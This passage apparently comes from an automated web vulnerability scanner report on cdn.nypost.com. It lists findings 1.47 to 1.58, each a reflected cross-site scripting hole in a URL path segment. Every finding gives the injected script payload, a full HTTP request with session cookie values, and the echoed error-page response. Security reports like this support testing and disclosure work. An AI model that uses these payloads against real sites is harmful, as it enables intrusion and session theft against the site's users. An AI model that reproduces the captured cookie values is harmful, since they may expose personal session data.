The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ca7f3<script>alert(1)</script>5e24e6fb15b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksca7f3<script>alert(1)</script>5e24e6fb15b/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:45 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksca7f3<script>alert(1)</script>5e24e6fb15b/shareit/shareit.js</p>
...[SNIP]...

1.47. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3b2ef<script>alert(1)</script>3065249c9f4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareit3b2ef<script>alert(1)</script>3065249c9f4/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:53 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit3b2ef<script>alert(1)</script>3065249c9f4/shareit.js</p>
...[SNIP]...

1.48. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5d9c8<script>alert(1)</script>21b824c49c9 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js5d9c8<script>alert(1)</script>21b824c49c9 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:08 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js5d9c8<script>alert(1)</script>21b824c49c9</p>
...[SNIP]...

1.49. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb649<script>alert(1)</script>11919a8a872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigeb649<script>alert(1)</script>11919a8a872/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigeb649<script>alert(1)</script>11919a8a872/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.50. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76d62<script>alert(1)</script>f7ccbce8073 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal76d62<script>alert(1)</script>f7ccbce8073/nypost/blocks/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal76d62<script>alert(1)</script>f7ccbce8073/nypost/blocks/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.51. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241af<script>alert(1)</script>bb94293df62 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost241af<script>alert(1)</script>bb94293df62/blocks/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost241af<script>alert(1)</script>bb94293df62/blocks/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.52. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1802e<script>alert(1)</script>ade49ab0bd9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks1802e<script>alert(1)</script>ade49ab0bd9/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:35 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks1802e<script>alert(1)</script>ade49ab0bd9/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.53. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c819<script>alert(1)</script>4ceecdf86bb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/sticky_notes8c819<script>alert(1)</script>4ceecdf86bb/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:43 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/sticky_notes8c819<script>alert(1)</script>4ceecdf86bb/sticky_notes.js</p>
...[SNIP]...

1.54. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8deb2<script>alert(1)</script>68d888ca74 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js8deb2<script>alert(1)</script>68d888ca74 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js8deb2<script>alert(1)</script>68d888ca74</p>
...[SNIP]...

1.55. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d17ee<script>alert(1)</script>4ace09c91e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigd17ee<script>alert(1)</script>4ace09c91e1/WebPortal/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigd17ee<script>alert(1)</script>4ace09c91e1/WebPortal/nypost/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.56. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54b48<script>alert(1)</script>4e5e68869c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal54b48<script>alert(1)</script>4e5e68869c0/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal54b48<script>alert(1)</script>4e5e68869c0/nypost/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.57. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75cd3<script>alert(1)</script>9fd373f58b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost75cd3<script>alert(1)</script>9fd373f58b8/blocks/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost75cd3<script>alert(1)</script>9fd373f58b8/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.58. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1695f<script>alert(1)</script>1bcf5332e79 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks1695f<script>alert(1)</script>1bcf5332e79/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
